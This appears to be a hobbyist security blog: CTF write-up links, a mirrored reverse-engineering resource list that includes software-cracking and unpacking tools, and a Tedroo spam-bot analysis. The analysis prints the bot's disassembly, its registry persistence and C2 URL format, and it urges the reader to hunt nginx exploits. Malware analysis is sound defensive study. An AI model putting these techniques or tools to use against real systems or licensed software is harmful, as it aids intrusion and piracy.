http://www.sinfocol.org/2011/03/writeup-forensics300-codegate-2011/ (colombian)

Forensic 400

Forensic 500

Crypto 100

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Crypto 200

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Crypto 300

http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto300-writeup/

Crypto 400

http://isc.sans.edu/diary.html?storyid=10501&rss&utm_source=twitterfeed&utm_medium=twitter

Crypto 500

Binary 100

http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http%3A%2F%2Fwww.lestutosdenico.com%2Fevenements%2Fwriteup-codegate-2011

http://www.lestutosdenico.com/evenements/writeup-codegate-2011 (French)

Binary 200

Binary 300

Binary 400

Binary 500

Network 100

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Network 200

http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/

Network 300

Network 400

Network 500

Posted in Uncategorized

Well given the recent take down of reverse-engineering.net for unknown reasons I’ve decided to mirror some content here. I’ve formatted out some of the bits like user posts identities and cleaned up some formatting. Other than that I have NOT link checked so not sure what are good/bad links here. Hope you find it useful and woodmann.com will probably mirror the entire archive before to long.

****START PASTIE******

What do I learn first?

—>>path 1:

1 ) visit http://video.reverse-engineering.net/ to view some reversing videos that train you in the RCE basis.
2 ) check http://www.crackmes.de to find some visual solution submitted for crackmes.
3 ) Try to repeat the shown steps, and reproduce them with other crackmes. This will bring you quickly to practice.
4 ) Learn ‘on-demand’ what you need to know over the time by using linked resources about languages, apis, forum etc. you can find in this section.

—>> path 2:

1 ) read http://www.cplusplus.com/doc/tutorial/ up to “Compound Data Types:” included
2 ) read http://www.winprog.org/tutorial/ up to “Graphics Device Interface” included (use the Win32 help file -below- to understand Win32 functions better)
3 ) Now you know the Win32 basis, select an Assembler Ebook/tutorial and start learning a bit of assembler -the more, the better.
4 ) Take Olly -below-, go to http://www.crackmes.de and select some crackme level 1
5 ) read the solution of 2-4 solved crackmes of level 1!!
6 ) select a solved crackme lvl1 and try to solve it. If you have problems, read the solution and TRY TO DO the steps of the solver.
7 ) goto 6 until you solve lvl1 crackmes very easily
8 ) Increase level difficulty by 1, goto 5!

1. Full Newbie Tutorials
2. Challenges and Tutorials at *any* level
3. Tutorials, Papers, Documentation, Books (all Free)
4. Learning Programming Languages (ASM etc.)
5. Debuggers/Disassemblers
6. Tools of Our Trade
7. Linux Related
8. Suggested Books (not free)
9. Advanced Reversing Papers/Material
10. Hacking over the Net…
————————

1. Full Tutorials
————————

Course for Newbies

http://www.freewebs.com/fdemunck/newbieproject1.rar

Very Assembler Basis, SICE Usage, Basic Techniques. A very good set of tutorials from LoRd HrUn. Also explains what is the ‘stuff’ you see when you open a debugger for the first time… (link is missing for now, to be restored)

Lessons for Newbies
http://evilteach.8k.com/ : a collection of 4 lessons with material that explain you what mean the things you see when you start reversing a program.

2. Challenges and Tutorials at *any* level:
————————

Challenges for Crackers, at any Level
http://crackmes.de/ ; you can find many legal crackmes(=stuff you can legally crack) here to test your skills
Being sorted by difficult grade -most of them offers one or more TUTORIAL for their solution-, it is also the biggest tutorial collection available today.

3. Tutorials, Papers, Documentation, Books (Free)
————————

(note: material for learning languages is in the appropriate section!)

Win32 API Help File
http://www.borland.com/devsupport/borlandcpp/patches/BC52HLP1.ZIP ; here you can download the Win32 help file for the external link with Olly.
Do not even THINK to do without this. API reference is essential, so take it if you haven’t it yet.

Win32 Basis
http://www.winprog.org/tutorial/index.html ; here you learn the true basis of Win32 API programming, in C. Just read it ALL. The more you know about Windows, the better you understand what’s happen when reversing code.

Introduction to Cryptography (full free ebook)
http://www.cacr.math.uwaterloo.ca/hac/ The “Handbook of Applied Cryptography”, a cool free e-book on cryptography. Excellent as a quick reference.

Introduction to Cryptography (full course)
http://www.cs.washington.edu/education/courses/csep590/06wi/ ; a whole course that introduces to cryptography and ciphers, with all the materials and assignments online!! A very good starting point for cryptos.

Introduction to Cryptography (Tutorials)
http://www.antilles.k12.vi.us/math/cryptotut/home.htm ; a set of easy tutorials on ciphers. Highly recommended.

Cryptography Tutorials (ECC)
http://www.certicom.com/index.php?actio … cc_tut_1_0 ; a very nice link on Elliptic Curve -worth to read about.

Inject code, General Reversing Introduction Tutorial/Document
http://www.codeproject.com/useritems/inject2exe.asp ; this article contains clean references to the basic tools (ResHacker, Debuggers, Disassemblers) and exaplian also how to inject code into an executable.

SEH Paper/Tutorial/Document
http://www.jorgon.freeserve.co.uk/Except/Except.htm ; a paper that tells you what you need to know on SEH and Trap Flag tricks

PE Format, AntiDebug, AntiDump, Iczelion Assembler Tutorials/Papers/Documents
http://www.migeel.sk/anticrack/showpage.php?page=downloads ;This page contains few zipped papers that can be useful.

Art of Disassembly E-BOOK

http://aod.reverse-engineering.net/

Article on PE Header at Code-Breakers Journal (CBJ)
http://www.secure-software-engineering.com/index.php?option=com_content&task=view&id=60 ; contains a very detailed and easy explanation of all the PE sections (IAT -Import Address Table, EAT -Export Address Table, Sections, Directories, Resources etc.) how alter them and what they are. From beginners to experts.

PE Header Reference
this text contains a description of the PE Header which is good to keep as a quick reference. For learning the PE header structure and fields, I suggest the above CBJ article.

http://webster.cs.ucr.edu/Page_TechDocs/pe.txt

Quick Assembler Reference
a quick reference to pentium ASM instructions. Just click the initial letter, and select the ASM mnemonic. Very handy (especially if you download the whole site into your HD )

http://faydoc.tripod.com/cpu/index_v.htm

Quick Guide to Network Programming
a quick tutorial for learning the basis of network programming, without spending too much time.

http://beej.us/guide/bgnet/output/htmlsingle/bgnet.html

Adding Sections to PE, RVAs and Import table, loaders/patcher code
http://www.sunshine2k.de/Articles.htm ; this site contains some small, very basic articles on PE, Import table, Basic DLL Injection and loader’s coding.

4. Learning Languages (ASM etc.):
————————

Learning Assembler Language E-BOOK (A)
hxxp://webster.cs.ucr.edu/ ; the HLA Assembler home page. An excellent, free EBOOK for learning Assembler, “The Art of Assembly Language”, with HLA compiler and many tools. The site has a Linux section.

Learning Assembler Language E-BOOK (B)
http://www.drpaulcarter.com/pcasm/ ; this site contains an *excellent* free EBOOK that teaches Assembler language from scratch. Translated in various languages. Pretty good. If you are not interested in HLA, this is a valid alternative.

Learning Assembler Language E-BOOK (C)
http://savannah.nongnu.org/projects/pgubook/ ; a good free ebook that teaches Assembler from scratch, explaining even what a “word” is. “Small” drawback: AT&T Assembler syntax .

Learning C++ Language
http://www.cplusplus.com/doc/tutorial/ ; this tutorial gives you the basis of C++ language, for starting coding your keygen’s, and helping you reversing C++ stuff.

Rapid Application Development with MASM/HLA
hxxp://www.radasm.com/ ; a R.A.D. IDE for the MASM/HLA assembler (and the links to masm32 Compiler and related stuff). Note: the Masm32 compiler contains the famous Iczelion’s tutorials on Assembler language in the “X:\masm32\icztutes” folder.

Freeware C++/Pascal
http://www.bloodshed.net/ ; If you need a free compiler for writing your keygens, you can find there a C++ or a Pascal one. The C++ core is the GNUCPP.

Freeware Borland C++ 5.5
hxxp://www.winprog.org/tutorial/bcpp.html ; this page gives all the needed links to download BC++5, with a bit of explanation.

12 lessons on Assembler and RosASM
http://rosasm.org ; RosASM Assembler contains 12 lessons on basic assembly, written with a “generic syntax” so that the beginner could, later, switch, with as few problems as possible, to the Assembler he will finally choose.

5. Debuggers/Disassemblers:
————————
(note: Ring0 means you can use it for debugging Kernel Drivers, and generally it is tougher to use than Ring3 debuggers)

OLLY
http://ollydbg.de/ ; the home of the most used Ring-3 Debugger, OllyDebug. A must have.
(ps: you can find a link to the Win32 help file below)

SYSER
http://www.sysersoft.com/ ; Syser is an excellent, visual Ring0 (and Ring3) debugger. It is not yet very stable but, if it works for you, it’s very cool.

WinDBG

http://www.Micro$oft.com/whdc/devtools/debugging/default.mspx

Home of WinDBG debugger (Ring0 too). Seen the site, I don’t think I need to add much more…

IDA
http://www.datarescue.com/ ; IDA home. IDA is an Interactive DeAssember, used to perform a static analisys of the assembler code.
(IDA 4.3 free: http://www.downloadjunction.com/product/software/69070/)

PVDASM
http://pvdasm.reverse-engineering.net/ ; PVDasm is a very interesting Disassembler project, made by Ben and supported in this Board. It also allows you to export code directly MASM syntax format.

OLLY Plugins
http://woodmann.net/ollystuph/index.php ; The “Stuph” page contains many useful OllyDebug Plugins.

Shadow’s OLLY
hxxp://navig8.to/Shadow/ ; a modded Olly… a charged bazooka …usage: when needed.

6. Tools of Our Trade:
————————

FILEMON, REGMON
hxxp://www.sysinternals.com/FileAndDiskUtilities.html This is the home of the Marc guru and of our first, must-have TOTs. A very interesting site to visit, from time to time. And a source of useful tools.

LordPE
hxxp://www.softpedia.com/get/Programming/File-Editors/LordPE.shtml This tool enables you to explore and alter PE Header. You can modify/add sections, directories, IAT, and more. It is also a Dumper Server, in case you need.

7. Linux Related:
————————
Well, the HLA home site listed above, for Assembly on Linux.

ASSEMBLER E-BOOK
http://savannah.nongnu.org/projects/pgubook/ ; a good free ebook that teaches Assembler from scratch, explaining even what a “word” is. “Small” drawback: AT&T Assembler syntax .

NASM Assembler
hxxp://nasm.sourceforge.net/ ; a free assembler for Linux. On SourceForge, so you can work TO it, if you wish.

GNU Debugger
hxxp://www.gnu.org/software/gdb/gdb.html/ ; the GNU project debugger. It can run on both Linux&Windows, and support remote debugging.

8. Suggested Books (not free)
————————

Reversing: Secrets of Reverse Engineering
http://www.amazon.com/gp/product/0764574817/sr=1-1/qid=1138097867/ref=pd_bbs_1/002-6173215-8598445?%5Fencoding=UTF8 ; a good book for learning the basis of reversing engineering. Probably one of the best to start with. Worth its money.

Rootkits : Subverting the Windows Kernel
http://www.amazon.com/gp/offer-listing/0321294319/ref=dp_olp_2/002-6173215-8598445?%5Fencoding=UTF8 ; an ADVANCED book, not a reading for a newbie -at all. Consider it when you wish to go a true ‘step ahead’ in reversing. Many techniques you otherwise learn ‘the hard way’ (sigh!) are clearly explained and shown there, a must-have. Worth its money.

9. Advanced Reversing Papers/Material
————————

Reversing an Application -Analysis Example
http://www.honeynet.org/scans/scan33/nico/ ; an excellent discussion on reversing and anti-reversing techniques, from PE header to anti-debugging and virtual machines.

Disassembler and other tools
hxxp://www.cybertech.net/~sh0ksh0k/projects/ ; a set of utilities that covers DLL injection on live/suspended, tracer, c parser (why not using yacc?) port redirector etc.

PE Import Table structure and Redirection
hxxp://www.codeproject.com/useritems/inject2it.asp ; this article contains images and explanation of what the Import Table is, and how it can be redirected.

10. Hacking over the Net…
————————

Introduction to Hacking
hxxp://www.pulltheplug.org/wargames/vortex/ ; a wargame made for newbies to teach (anti-)hacking and C programming. Will teach you how manage basic exploitation techniques (and yes, tells you what an exploit is).

————————
Also, I suggest to google for the “programmers tools”, the org one
Last edited by Maximus on 07-26-2007 08:29 AM, edited 65 times in total.

Import Table Rebuilding
————————
hxxp://www.yates2k.net/rebuild.txt
hxxp://sandsprite.com/CodeStuff/Underst … ports.html

Code Injection
—————-
hxxp://biw.rult.at/tuts/dlladdfunc.htm
hxxp://www.woodmann.com/fravia/lazcalc.htm

http://www.freewebs.com/fdemunck/newbieproject1.rar

Online x86 Disassembler
———————————-
PVPHP – Online Disassembler – PVPHP Is the First ever seen x86 Online
Disassembler, which is capable of disassembling a PE based executable files.

I think the official vendor manual can be a good source of information too. Especially the volumes on system programming.
IA-32 Intel® Architecture Software Developer’s Manuals
AMD64 Architecture Tech Docs

ARM Documentation
AVR Documentation
SH4/5 SuperH Documentation

Article on PE Header at Code-Breakers Journal (CBJ)
contains a very detailed and easy explanation of all the PE sections (IAT -Import Address Table, EAT -Export Address Table, Sections, Directories, Resources etc.) how alter them and what they are. From beginners to experts.
http://www.codebreakers-journal.com/viewarticle.php?id=74&layout=abstract ;

Network Programming using win32asm

http://www.madwizard.org/programming/tutorials/netasm/

This is a basic website for hacking, starting with the basic

http://www.hackthissite.org/

http://www.scientific-hacking.com

*Use google here to find file repositories. If you can’t figure that out find a new hobby/profession.

ReWrit’s AIO Cracking CD.part1 ******* (48,8 mb)
ReWrit’s AIO Cracking CD.part2 ******* (48,8 mb)
ReWrit’s AIO Cracking CD.part3 ******* (5 mb)

Tool List:

few crackmes (from http://www.crackmes.de)
BVReFormer
Net Reflector
CrypTool
OllyDbg 1.10 & Plugins
W32Dasm 8.93 – Patched
PEiD 0.93 + Plugins
RDG Packer Detector v0.5.6 Beta – English
ImpRec 1.6 – Fixed by MaRKuS_TH-DJM/SnD
Revirgin 1.5 – Fixed
LordPE De Luxe B
FSG 2.0
MEW 11 1.2 SE
UPX 1.25 & GUI
SLVc0deProtector 0.61
ARM Protector v0.3
WinUpack v0.31 Beta
dUP 2
CodeFusion 3.0
Universal Patcher Pro v2.0
Universal Patcher v1.7
Universal Loader Creator v1.2
aPatch v1.07
PMaker v1.2.0.0
Tola’s Patch Engine v2.03b
ABEL Loader v2.31
Yoda’s Process Patcher
Registry Patch Creator
ScAEvoLa’s PatchEngine v1.33
Dogbert’s Genuine Patching Engine v1.41
Graphical-PatchMaker v1.4
The aPE v0.0.7 BETA
Liquid2
PELG v0.3
PrincessSandy v1.0
Biew v5.6.2
Hiew v7.10
WinHex v12.5
DeDe 3.50.04
VB ’Decompiler’ Lite v0.4
Flasm
ACProtect – ACStripper
ASPack – ASPackDie
ASProtect > Stripper 2.07 Final & Stripper 2.11 RC2
DBPE > UnDBPE
FSG 1.33 > Pumqara’s Dumper
FSG 2.00 > UnFSG
MEW > UnMEW
PeCompact 1.x > UnPecomp
PEncrypt > UnPEncrypt
PeSpin 0.3 > DeSpinner 0.3
tELock 0.98-1.0 > UntELock
EXEStealth > UnStealth
Xtreme-Protector / Themida > XprotStripper v1.1
Morphine Killer 1.1 by SuperCracker/SND
ASPR Dumper v0.1
Armadillo Process Detach v1.1
Armadillo Dumper v1.0
Armadillo Nanomite Fixer
Armadillo Distance Decryptor aka Jump Table Fixer
ArmTools (Translated!)
ArmInline v0.1
Quick Unpack v1.0b3
Procdump v1.6.2
TMG Ripper Studio 0.02
FileMon v7 (Patched)
RegMon v7 (Patched)
RSATool 2
DAMN HashCalc
EVACleaner 2.7
Process Explorer
Resource Hacker
PUPE 2002
PointH Locator
ASPR CRC Locator 1.2
PE Tools 1.5 RC5
API Address Finder
Jump to Hex Convertor
PE GeNeRaToR 1.2.1
Quick File Viewer v1.0.1
PE Insight 0.3b
Crypto Searcher
PE Editor v1.7
bkslash’s Inline Patcher
Stud_PE v2.1
Injecta v0.2
PE Rebuilder v0.96b
PE Optimizer v1.4
ToPo v1.2
NFO Builder 2000 v1.02
NFO File Maker v1.6
TMG NFOmakeR v1.0
hCalc

http://www.woodmann.com/collaborative/tools/index.php/OllyDbg_(Shadow_Modification)

http://www.orkspace.net/secdocs/ and spend some time there.

Posted in Uncategorized

This is a tutorial analyzing the Tedroo spam bot. The MD5 for the binary is 37d0738dec3c65e416aec49e36db81b4. I’ve taken the binaries off the blog but send me an email ( brad _at_ reverseco (d0t) de ) if you’d like the binaries and want to dive in yourself. Thanks Greg Newman for providing this piece of malware. I’m going to try to keep this brief as possible and hit on only the high points of what this program does. It’s a spam worm that has been picked up/identified by some of the popular AV engines via VirusTotal.  This is the total from the packed exe.

Crazy enough the VirusTotal for the dumped binary has LESS of a detection prominence in the Anti-Virus community.  Not sure why that is?!?

As you can see this thing goes by a few different names. Well we can fire up IDA and load up the dump that was garnered from the original executable here.  The packer isn’t identified with PEid but it was easy enough to find the OEP and use Ollydump to make a valid file.

After some static/dynamic analysis the dropper does a few things. The dropper specifies the download server to connect out to as well as a decryption routine to decrypt the api’s that are included in the binary. The algorithm for the encrypted api’s is pretty easy to reverse and it’s pseudocode is [encrypted_address+counter] XOR [0x54 + counter]. Here is a sample of one of the routines. Later on it hides the calling conventions to these API’s to make static analysis more difficult.

.text:00403728
.text:00403728 decrypt_api_ntohs: ; CODE XREF: start+224j
.text:00403728 mov dl, al
.text:0040372A add dl, 54h
.text:0040372D xor byte_405590[eax], dl
.text:00403733 inc eax
.text:00403734 cmp eax, 6
.text:00403737 jb short decrypt_api_ntohs
.text:00403739 xor eax, eax

This routine will decrypt the strings for the API’s that it wishes to load. It utilizes these later by pushing the decrypted api string onto the stack then calling GetProcAddress to let the program know where it’s located in memory for future reference.

.text:00403945 push offset byte_40555C ; lpProcName
.text:0040394A push dword_4059A0 ; hModule
.text:00403950 mov dword_405988, eax
.text:00403955 call esi ; GetProcAddress

After decrypting and loading libraries that will be utilized the dropper tries to throw us off the trail by calling the Sleep API for 10 minutes.  Feel free to modify this to 0 or go grab a cup of coffee!

.text:00403A85 push 927C0h ; dwMilliseconds
.text:00403A8A call esi ; Sleep ; wait 10 minutes

Next up drop file routine is called and it copies itself to userini.exe in the system32 directory. This is an exact copy of the dump file that is included in the archive above.  Two threads are then created that do the spam list requesting and other things that we’ll explore now.

.text:00403A91 push edi
.text:00403A92 push edi
.text:00403A93 push edi
.text:00403A94 push offset Thread1
.text:00403A99 push edi
.text:00403A9A push edi
.text:00403A9B call CreateThread ; createthread
.text:00403AA1 push edi
.text:00403AA2 push edi
.text:00403AA3 push edi
.text:00403AA4 push offset Thread2
.text:00403AA9 push edi
.text:00403AAA push edi
.text:00403AAB mov dword_405964, eax ; result from CreateThread
.text:00403AB0 call CreateThread
.text:00403AB6 mov dword_4059DC, eax ; Result from CreateThread

One thread is relegated to making sure our registry keys are made to startup and the other thread gets some encrypted xml from the spam server.  Most notable registry locations that have been plucked from the subroutine @ 401CB4 are….

Software\Microsoft\Windows\CurrentVersion\run
Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Explorer

There are additional registry strings that are in the file but are not currently used. The others attempt to modify firewall settings to make sure the malware has an open line to the internet. The next step is to report to the spam server and do it’s bidding. The second thread in the program forms a http GET request that has a similar structure to this url http://[SPAM_SERVER_IP]/source/zxhttr.php?id=[WINDOWS_REGID]&tick=[UPTIME_DATA]&ver=[WSOCKVER]&smtp=ok&task=3″.  Once the response is read into the buffer this is our encrypted xml string that contains who to spam, what to spam them with. This information can change and it looks like the program has a capability to update itself if the botmasters decide to serve up something else. Here is the routine where the string is formatted before it hits the wire.

.text:0040321B
.text:0040321B Format_String_Wire: ; “202″
.text:0040321B push offset a202
.text:00403220 call atoi
.text:00403225 pop ecx
.text:00403226 push dword_405A0C
.text:0040322C push offset aOk ; “ok”
.text:00403231 push eax
.text:00403232 call dword_405694
.text:00403238 mov ebx, ds:sprintf
.text:0040323E push eax
.text:0040323F push offset Dest
.text:00403244 push offset aSourceZxhttr_p ; “/source/zxhttr.php”
.text:00403249 lea eax, [ebp+Dest]
.text:0040324F push offset aS?idSTickDVerD ; “%s?id=%s&tick=%d&ver=%d&smtp=%s&task=%d”…
.text:00403254 push eax ; Dest
.text:00403255 call ebx ; sprintf

Now if you notice there’s a few variables that get passed back to the spam server. ID is our unique windows id from the regkey “id” @ HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer. Tick is derived from GetTickCount API which reports back how long it’s been since we’ve booted up so this returns uptime data to the spammers. Version is hardcoded in the program but appears to request version 2.02 of windows sockets. Task is an internal notation to the spam server to flag “3″ as sending out spam activity.

*If you also notice this particular server is running Server: nginx/0.6.32.  This was fished out of the http response.  Notice there are numerous exploits for this server and how it was probably compromised into a spam press!  Use the following search string to track some down (nginx + “security advisory” + “0.6.32″).  Of course you can modify this to find POC’s or whatnot .

Next we’re going to dive into the decryption routine for the http response as well as utilize some code to do this for us.

.text:00401874
.text:00401874 Decrypt_HTTP_Stream: ; CODE XREF: sub_40184E+5Fj
.text:00401874 push [ebp+var_8]
.text:00401877 lea eax, [ebp+var_1]
.text:0040187A call sub_401223
.text:0040187F mov al, byte ptr Dest[edi]
.text:00401885 add al, 20h
.text:00401887 xor al, [ebp+var_1]
.text:0040188A inc edi
.text:0040188B mov [esi+ebx], al
.text:0040188E mov eax, offset Dest
.text:00401893 lea ecx, [eax+1]

I’m going to use python here btw.  Python to construct the http responses as it’s very quick/easy to utilize urllib2 to construct this data and save it.  Here is the source. The decryption algorithm works like this. The original stream thats taken take the 2 bytes and produce a hex representation of them. “68″ would be 0×68. Take this and XOR this with the ID from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\id + 0×20. So if the first character from your id is “4″ it’d be 0×34 + 0×20 = 0×54. 0×54 XOR 0×68 gives us 0x3C which is “<” or the first character of an xml formatted tag.  Here is an example of a decrypted portion from the server.

<config>
</config>
<info>
taskid=3
realip=MY_IP_HERE
hostname=MY_HOSTNAME_HERE
style=0
</info>
<emails>
email123@spamme.com
email12390@email.com
</emails>
</info>

This is how the response looks after decryption and directs the program flow throughout the bot. The python script should clear up any questions you may have. This could change as the botmasters could serve up a different program. The flags to look for those routines are run and update. I’m thinking about coding up a php emulator to do just this for analysis or if anyone wants to volunteer that for additional study it’d be great

After our stream is processed in the program begins formatting email messages to send out over the wire. Processing occurs like this.

.text:00401E1C
.text:00401E1C push ebp
.text:00401E1D mov ebp, esp
.text:00401E1F sub esp, 258h
.text:00401E25 push ebx
.text:00401E26 push esi
.text:00401E27 push edi
.text:00401E28 mov esi, offset aHostname ; “hostname=”
.text:00401E2D lea edi, [ebp+var_48]
.text:00401E30 movsd
.text:00401E31 movsd
.text:00401E32 movsw
.text:00401E34 mov esi, offset aStyle ; “style=”
.text:00401E39 lea edi, [ebp+var_30]
.text:00401E3C movsd
.text:00401E3D movsw
.text:00401E3F movsb
.text:00401E40 mov eax, ds:dword_4042C8
.text:00401E45 mov esi, offset aEmails ; “<emails>”
.text:00401E4A lea edi, [ebp+var_3C]
.text:00401E4D movsd
.text:00401E4E movsd
.text:00401E4F movsb
.text:00401E50 mov esi, offset aInfo ; “<info>”
.text:00401E55 lea edi, [ebp+SubStr]
.text:00401E58 movsd
.text:00401E59 movsw
.text:00401E5B movsb
.text:00401E5C mov esi, offset aText ; “<text>”
.text:00401E61 lea edi, [ebp+var_1C]
.text:00401E64 mov [ebp+var_28], eax
.text:00401E67 mov eax, ds:dword_4042CC

Most notably these functions calls are around 402bd4 and it Create’s a seperate thread for each email message being sent. The email send routine is @ 4022BE. This basically queries the DNS of the spamee’s domain to see what mail server it resolves too.

<span style="color:#c0c0c0">.text:004022BE ; —————————————————————————
.text:004022BE
.text:004022BE Email_Send: ; CODE XREF: sub_402263+4Fj
.text:004022BE push esi ; Size
.text:004022BF push ebx ; Val
.text:004022C0 push ebp ; Dst
.text:004022C1 call memset
.text:004022C6 add esp, 0Ch
.text:004022C9 push ebx
.text:004022CA lea eax, [esp+1Ch+var_4]
.text:004022CE push eax
.text:004022CF push ebx
.text:004022D0 push ebx
.text:004022D1 push 0Fh
.text:004022D3 push [esp+2Ch+Email_Domain]
.text:004022D7 call dnsapi_DnsQueryA
.text:004022DD test eax, eax
.text:004022DF jnz loc_402681
.text:004022E5 mov ecx, [esp+18h+var_4]
.text:004022E9 call Get_MailServer
.text:004022EE mov edi, eax ; return mailserver of said domain
.text:004022F0 cmp edi, ebx
.text:004022F2 jz loc_40265C
.text:004022F8 push edi
.text:004022F9 push offset aConnectingS___ ; "Connecting %s …\r\n"
.text:004022FE push ebp ; Dest
.text:004022FF call ds:sprintf

Then it builds the packet to send and sends out the mail request using to/from as the same person and it sends out some viagra spam to that mail domain. Here is the following html that it sends out.

..

Click here!

..

Please don’t follow the links as it could be later modified to have some form of drive by downloading

Most namely are update/run.  So it looks like this server could switch over and begin hosting more malicious binaries that may install a rootkit or a more advanced spambot!  I hope you enjoyed this tear-down and feel free to leave feedback in the comments section.

*PS Large cash donation and firstborn children can be sent to my email as I’m a hobbyist!

Posted in Malware

#include <iostream.h>

main()

{

printf(“Hello world?!?”);

return 0;

}

Posted in Uncategorized